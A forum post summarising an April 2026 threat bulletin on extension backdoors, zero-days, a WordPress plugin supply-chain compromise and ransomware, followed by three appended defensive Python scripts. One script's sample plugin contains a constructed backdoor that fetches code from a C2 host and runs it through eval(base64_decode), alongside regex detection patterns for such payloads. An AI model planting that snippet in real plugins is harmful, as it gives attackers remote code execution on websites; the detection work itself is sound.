Tagged: 17-Year-Old Excel RCE, Defender 0-day, MSOC in the Philippines, SonicWall BruteForce, Threats
- April 17, 2026 at 10:04 am #1956
Rameses Quiambao
Summary
A weekly cybersecurity threat bulletin highlights multiple active attacks, zero-days, supply chain compromises, ransomware campaigns, and large-scale fraud operations affecting enterprises, cloud environments, browsers, and end users.
The report covers:
• Active exploitation of legacy and new vulnerabilities
• Browser-based malware campaigns (Chrome extensions)
• Cloud and identity theft targeting major providers
• Supply chain attacks affecting widely used software
• Ransomware and phishing campaigns across regions
Key Threats Overview
This week’s major themes include:
• Browser extensions used as stealth backdoors
• Zero-day exploits affecting Microsoft Defender and Windows
• Legacy vulnerabilities (17-year-old Excel RCE) still under active exploitation
• Cloud credential theft targeting AWS, Azure, and GCP
• Supply chain attacks via WordPress plugins
• Large-scale fraud and malware distribution networks
• Increased brute-force attacks against edge devices
Technical Details
1. Browser Extension Backdoor Campaigns
• Malicious Chrome extensions detected in coordinated campaigns
• Designed for:
  - OAuth2 token theft (Google accounts)
  - Telegram session hijacking
  - Ad injection (YouTube, TikTok)
  - Full-page script execution
  - Data exfiltration via C2 servers
• Common behavior:
  - Runs silently in background scripts
  - Opens attacker-controlled URLs on browser startup
  - Uses shared command-and-control infrastructure
2. Microsoft Defender Zero-Day (RedSun)
• Privilege escalation vulnerability affecting Windows 10/11 and Server
• Enables escalation from standard user → SYSTEM
• Requires Microsoft Defender to be enabled
• Reported as highly reliable and actively weaponizable
3. Legacy Microsoft Excel RCE (CVE-2009-0238)
• 17-year-old vulnerability re-added to CISA KEV list
• Triggered by specially crafted Excel files
• Leads to full remote code execution if opened by user
• Still actively exploited in modern environments
4. Cloud Credential Stealer (APT41)
• Linux ELF backdoor targeting:
  - AWS
  - Microsoft Azure
  - Google Cloud
  - Alibaba Cloud
• Uses SMTP port 25 as covert C2 channel
• Harvests credentials and cloud metadata
• Includes stealth handshake validation to evade scanning tools
5. WordPress Supply Chain Attack
• Plugin vendor compromised after acquisition
• Backdoor injected into plugins used by ~180,000 websites
• Features:
  - Hidden PHP payload injection
  - C2-driven spam/redirect delivery
  - Cloaked behavior targeting Googlebot only
  - Ethereum-based domain resolution for resilience
6. Fake Mobile App Financial Theft
• Fake Ledger app distributed via Apple App Store
• Resulted in ~$9.5M stolen from crypto users
• Attack method:
  - Seed phrase harvesting
  - Direct wallet takeover
• Additional malicious app collected sensitive biometric and personal data
7. Ransomware & Malware Campaigns
JanaWare Ransomware (Turkey-targeted):
• Delivered via phishing emails + Google Drive links
• Executes malicious JAR files via javaw.exe
• Uses geofencing for Turkish victims only
• Low-value ransom ($200–$400), high-volume targeting
SmokedHam → Qilin ransomware chain:
• Delivered via malvertising
• Uses legitimate remote tools for persistence
• Leads to credential theft and lateral movement
8. Edge Device Brute-Force Attacks
• Surge in attacks against:
  - SonicWall
  - FortiGate
• 88% of activity traced to Middle East sources
• Focus on weak credentials and exposed interfaces
• High reconnaissance activity across enterprise perimeter devices
9. Fraud & Underground Ecosystems
Triad Nexus Fraud Network:
• Uses front companies and cloud laundering
• Creates fake enterprise-grade phishing sites
• Responsible for ~$200M+ in losses
• Expanding globally across multiple regions
Xinbi Guarantee Marketplace:
• Telegram-based illicit marketplace
• Over $21B in transaction volume
• Provides laundering, scam support, and illegal goods
10. WordPress Plugin Backdoor (Essential Plugin)
• Supply chain compromise via plugin acquisition
• Injects hidden PHP backdoor into sites
• Uses:
  - C2-controlled spam injection
  - Googlebot cloaking
  - Smart contract-based domain resolution
Observed Attack Lifecycle
Initial Access
• Phishing emails
• Malicious browser extensions
• Supply chain compromises
• Malvertising campaigns
Execution
• Payloads executed via scripts, JAR files, or browser processes
• Exploitation of user trust and legitimate software
Persistence
• Browser startup backdoors
• Cloud credential access
• Embedded WordPress PHP payloads
Command & Control
• Shared C2 infrastructure
• SMTP tunneling (cloud attacks)
• Domain rotation via blockchain mechanisms
Threat Actor Landscape
Attribution includes:
• APT41 (China-linked cloud targeting)
• UNC1069 (North Korea-linked social engineering)
• Multiple ransomware affiliates (Qilin, DarkSide ecosystem overlap)
• Unknown coordinated browser extension operators
• Supply chain attackers targeting WordPress ecosystem
Impact
This threat landscape demonstrates:
• Increased abuse of trusted platforms (Chrome, Apple App Store, WordPress)
• Persistent exploitation of legacy vulnerabilities
• Growing focus on cloud identity theft and session hijacking
• Browser-based attacks becoming a primary entry point
• Supply chain compromise as a dominant enterprise risk
Risks to organizations:
• Credential theft (Google, Telegram, cloud accounts)
• Persistent browser-level backdoors
• Cloud workload compromise
• Data exfiltration via legitimate tools
• Large-scale ransomware exposure
Mitigation
Recommended defensive actions:
• Enforce strict browser extension policies
• Monitor OAuth token usage and anomalies
• Patch legacy vulnerabilities (especially Office and Defender-related CVEs)
• Restrict cloud API credentials and rotate keys regularly
• Block unauthorized JAR and script execution
• Harden perimeter devices (SonicWall, FortiGate)
• Audit WordPress plugins and supply chain dependencies
• Use MFA across all critical accounts
• Monitor C2 indicators and unusual outbound traffic
Reference:
• https://thehackernews.com/2026/04/threatsday-bulletin-17-year-old-excel.html
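Added example (not part of the post or the bulletin it summarises): a triage script for the "Browser Extension Backdoor" section and the "Enforce strict browser extension policies" mitigation. It walks a Chrome profile's Extensions directory, parses each manifest.json and scores the combination the post describes: cookie and webRequest access, host permissions on Google and Telegram, a content script matched on every page, a background worker, and absence from an allowlist. The permission weights, the sensitive host list, the review threshold of 8 and the two sample manifests are all constructed for illustration.

```python
import json
from pathlib import Path

# Weights for permissions that give an extension the reach described in the
# bulletin (session/cookie theft, request interception, page injection).
# The weights and the review threshold are an assumption, not a published scheme.
RISKY_PERMISSIONS = {
    "<all_urls>": 4, "webRequest": 3, "webRequestBlocking": 3, "cookies": 3,
    "identity": 3, "management": 3, "scripting": 2, "tabs": 2,
    "webNavigation": 2, "declarativeNetRequest": 2, "storage": 1,
}
# Hosts the post names as targets (Google OAuth, Telegram Web, YouTube, TikTok).
SENSITIVE_HOSTS = ("google.com", "telegram.org", "youtube.com", "tiktok.com")
REVIEW_THRESHOLD = 8


def host_matches_sensitive(pattern: str) -> bool:
    """True if a match pattern covers every host or one of the sensitive hosts."""
    if pattern in ("<all_urls>", "*://*/*", "http://*/*", "https://*/*"):
        return True
    return any(h in pattern for h in SENSITIVE_HOSTS)


def assess_manifest(ext_id: str, manifest: dict, allowlist: set) -> dict:
    """Score one extension manifest (MV2 or MV3) and record why."""
    reasons, score = [], 0
    perms = list(manifest.get("permissions", [])) + list(manifest.get("optional_permissions", []))
    hosts = list(manifest.get("host_permissions", []))
    # MV2 keeps host patterns inside "permissions"; treat those as host grants too.
    hosts += [p for p in perms if "://" in p or p == "<all_urls>"]
    for p in perms:
        if p in RISKY_PERMISSIONS:
            score += RISKY_PERMISSIONS[p]
            reasons.append(f"permission:{p}")
    for h in hosts:
        if host_matches_sensitive(h):
            score += 3
            reasons.append(f"host:{h}")
    # A content script matched broadly is what "full-page script execution" needs.
    for cs in manifest.get("content_scripts", []):
        if any(host_matches_sensitive(m) for m in cs.get("matches", [])):
            score += 2
            reasons.append("content_script:broad_match")
    # Silent C2 polling and startup URL opening live in the background context.
    bg = manifest.get("background", {})
    if bg.get("service_worker") or bg.get("scripts") or bg.get("page"):
        score += 1
        reasons.append("background:present")
    if ext_id not in allowlist:
        score += 2
        reasons.append("not_in_allowlist")
    verdict = "review" if score >= REVIEW_THRESHOLD else "ok"
    return {"id": ext_id, "name": manifest.get("name", "?"), "score": score,
            "reasons": reasons, "verdict": verdict}


def scan_profile(extensions_dir: Path, allowlist: set) -> list:
    """Walk <profile>/Extensions/<id>/<version>/manifest.json and score each one."""
    results = []
    id_dirs = sorted(extensions_dir.iterdir()) if extensions_dir.is_dir() else []
    for id_dir in id_dirs:
        for manifest_path in id_dir.glob("*/manifest.json"):
            with open(manifest_path, encoding="utf-8") as fh:
                results.append(assess_manifest(id_dir.name, json.load(fh), allowlist))
    return sorted(results, key=lambda r: -r["score"])


# Constructed sample manifests (not real extensions): a benign note-taker and
# one shaped like the backdoors the bulletin describes.
BENIGN = {"name": "Quick Notes", "manifest_version": 3, "permissions": ["storage"]}
SUSPECT = {"name": "Video Speed Helper", "manifest_version": 3,
           "permissions": ["cookies", "webRequest", "scripting", "tabs"],
           "host_permissions": ["*://*.google.com/*", "*://web.telegram.org/*"],
           "content_scripts": [{"matches": ["<all_urls>"], "js": ["inject.js"]}],
           "background": {"service_worker": "bg.js"}}
ALLOWLIST = {"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}  # hypothetical approved extension ID

if __name__ == "__main__":
    for r in (assess_manifest("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", BENIGN, ALLOWLIST),
              assess_manifest("bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb", SUSPECT, ALLOWLIST)):
        print(r["verdict"], r["name"], r["score"], r["reasons"])
```

To run it against a live profile, call scan_profile(Path.home() / ".config/google-chrome/Default/Extensions", ALLOWLIST) on Linux (the path differs per OS) with the IDs your ExtensionInstallAllowlist policy permits; anything scored "review" that is not in the allowlist is the case for an ExtensionInstallBlocklist of "*" with explicit allows.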
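Added example (not part of the post or the bulletin) for the two WordPress plugin sections and the "Audit WordPress plugins" mitigation: an indicator scan over plugin PHP source that looks for the shape described above, a payload that runs only when the visitor's User-Agent looks like Googlebot, fetches content from a remote host and executes it through an obfuscated eval. The regular expressions, the classification rule and the two PHP snippets are constructed for illustration; they are generic backdoor markers, not signatures from the bulletin.

```python
import re
from pathlib import Path

# Generic indicators of hidden PHP payloads and search-engine cloaking.
# Patterns are an assumption for illustration, not published detection rules.
INDICATORS = {
    "obfuscated_eval": re.compile(
        r"\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13|hex2bin)\s*\(", re.I),
    "dynamic_eval": re.compile(r"\b(eval|assert|create_function)\s*\(\s*\$\w+", re.I),
    "remote_fetch": re.compile(r"\b(curl_exec|file_get_contents|wp_remote_get|fsockopen)\s*\(", re.I),
    # User-Agent read followed within ~120 chars by a crawler name: cloaking gate.
    "bot_cloaking": re.compile(r"HTTP_USER_AGENT.{0,120}?(googlebot|bingbot)", re.I | re.S),
    # Hard-coded Ethereum address or JSON-RPC eth_call: contract-based C2 lookup.
    "eth_resolver": re.compile(r"\beth_call\b|0x[0-9a-fA-F]{40}"),
    # Hidden container wrapping a link: injected spam that only crawlers "see".
    "hidden_spam": re.compile(r"(display\s*:\s*none|visibility\s*:\s*hidden).{0,80}?<a\s", re.I | re.S),
}


def scan_php(source: str, path: str = "<memory>") -> list:
    """Return one finding per indicator hit with its line number and a snippet."""
    findings = []
    for name, rx in INDICATORS.items():
        for m in rx.finditer(source):
            line = source.count("\n", 0, m.start()) + 1
            snippet = source[m.start(): m.start() + 60].replace("\n", " ")
            findings.append({"path": path, "indicator": name, "line": line, "snippet": snippet})
    return findings


def classify(findings: list) -> str:
    """Code execution plus cloaking or a remote fetch is the backdoor shape in the
    bulletin; any single indicator on its own only merits a manual look."""
    names = {f["indicator"] for f in findings}
    exec_like = names & {"obfuscated_eval", "dynamic_eval"}
    if exec_like and names & {"bot_cloaking", "remote_fetch", "eth_resolver"}:
        return "likely_backdoor"
    return "suspicious" if names else "clean"


def scan_plugin_dir(root: Path) -> dict:
    """Classify every .php file under a wp-content/plugins/<plugin> tree."""
    verdicts = {}
    for php in sorted(Path(root).rglob("*.php")):
        text = php.read_text(encoding="utf-8", errors="replace")
        verdicts[str(php)] = classify(scan_php(text, str(php)))
    return verdicts


# Constructed sample plugin files (not taken from any real plugin).
BENIGN_PHP = """<?php
/* Plugin Name: Simple Footer */
add_action('wp_footer', function () {
    echo '<p class="footer-note">' . esc_html(get_option('sf_text', '')) . '</p>';
});
"""

BACKDOORED_PHP = """<?php
/* Plugin Name: Essential Widgets */
add_action('init', function () {
    if (stripos($_SERVER['HTTP_USER_AGENT'], 'Googlebot') === false) { return; }
    $c = wp_remote_get('http://' . $GLOBALS['c2'] . '/payload');
    eval(base64_decode($c['body']));
});
"""

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_PHP), ("backdoored", BACKDOORED_PHP)):
        hits = scan_php(src, label)
        print(label, classify(hits))
        for h in hits:
            print(f"  line {h['line']:>3} {h['indicator']:<16} {h['snippet']}")
```

Run scan_plugin_dir(Path("/var/www/html/wp-content/plugins")) after a plugin update, and diff the verdicts against the previous run: a plugin that went from clean to likely_backdoor on a version bump is the acquisition-compromise pattern the post describes.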
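Added example (not part of the post or the bulletin) for the "Edge Device Brute-Force Attacks" section and the "Harden perimeter devices" mitigation: a sliding-window detector over VPN/admin authentication events that raises a bruteforce alert for repeated failures from one source, a password-spray alert when one source cycles through many usernames, and a success-after-attack alert when a source that was already alerting then logs in. The log line format, the thresholds and the sample events are constructed for this example; they are not SonicWall's or FortiGate's real syslog schema, so parse() is the part to replace with your device's field names.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed line format (an assumption, not a vendor schema):
#   <ISO timestamp> auth_fail|auth_ok src=<ip> user=<name> svc=<sslvpn|admin>
LINE_RX = re.compile(
    r"^(?P<ts>\S+) auth_(?P<result>fail|ok) src=(?P<src>\S+) user=(?P<user>\S+) svc=(?P<svc>\S+)$")


def parse(line: str):
    """Parse one log line into a dict, or None if it does not match."""
    m = LINE_RX.match(line.strip())
    if not m:
        return None
    event = m.groupdict()
    event["ts"] = datetime.fromisoformat(event["ts"])
    return event


def detect(lines, window=timedelta(minutes=5), fail_threshold=10, spray_users=5) -> list:
    """Return alerts in time order. Each (type, src) pair is raised at most once."""
    events = sorted(filter(None, map(parse, lines)), key=lambda e: e["ts"])
    recent = defaultdict(deque)   # src -> deque of (ts, user) failures inside the window
    alerted = set()               # (alert_type, src) pairs already raised
    alerts = []

    def raise_once(kind, src, **extra):
        if (kind, src) not in alerted:
            alerted.add((kind, src))
            alerts.append({"type": kind, "src": src, **extra})

    for e in events:
        q = recent[e["src"]]
        while q and e["ts"] - q[0][0] > window:   # drop failures older than the window
            q.popleft()
        if e["result"] == "fail":
            q.append((e["ts"], e["user"]))
            if len(q) >= fail_threshold:
                raise_once("bruteforce", e["src"], failures=len(q))
            users = {u for _, u in q}
            if len(users) >= spray_users:
                raise_once("password_spray", e["src"], users=sorted(users))
        elif any(src == e["src"] for _, src in alerted):
            # A login from a source that was already brute-forcing or spraying.
            raise_once("success_after_attack", e["src"], user=e["user"], svc=e["svc"])
    return alerts


def _build_sample() -> list:
    """Constructed events: one brute-forcer, one sprayer, one ordinary user."""
    base = datetime(2026, 4, 14, 2, 0, 0)
    lines = []
    for i in range(12):   # 12 failures against admin in two minutes
        lines.append(f"{(base + timedelta(seconds=10 * i)).isoformat()} "
                     f"auth_fail src=203.0.113.7 user=admin svc=sslvpn")
    for i, u in enumerate(["admin", "jsmith", "backup", "vpn", "test", "guest"]):
        lines.append(f"{(base + timedelta(seconds=30 * i)).isoformat()} "
                     f"auth_fail src=198.51.100.9 user={u} svc=sslvpn")
    lines.append(f"{(base + timedelta(minutes=3)).isoformat()} auth_ok src=203.0.113.7 user=admin svc=sslvpn")
    lines.append(f"{(base + timedelta(minutes=1)).isoformat()} auth_fail src=192.0.2.5 user=alice svc=admin")
    lines.append(f"{(base + timedelta(minutes=1, seconds=20)).isoformat()} auth_ok src=192.0.2.5 user=alice svc=admin")
    lines.append("not a log line")
    return lines


SAMPLE_LOG = _build_sample()

if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(a)
```

The success-after-attack alert is the one worth paging on: a brute-force that ends in a successful login against an SSL VPN or admin interface means the weak credential the post warns about was found, and the response is a password reset plus session revocation, not just a block rule.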

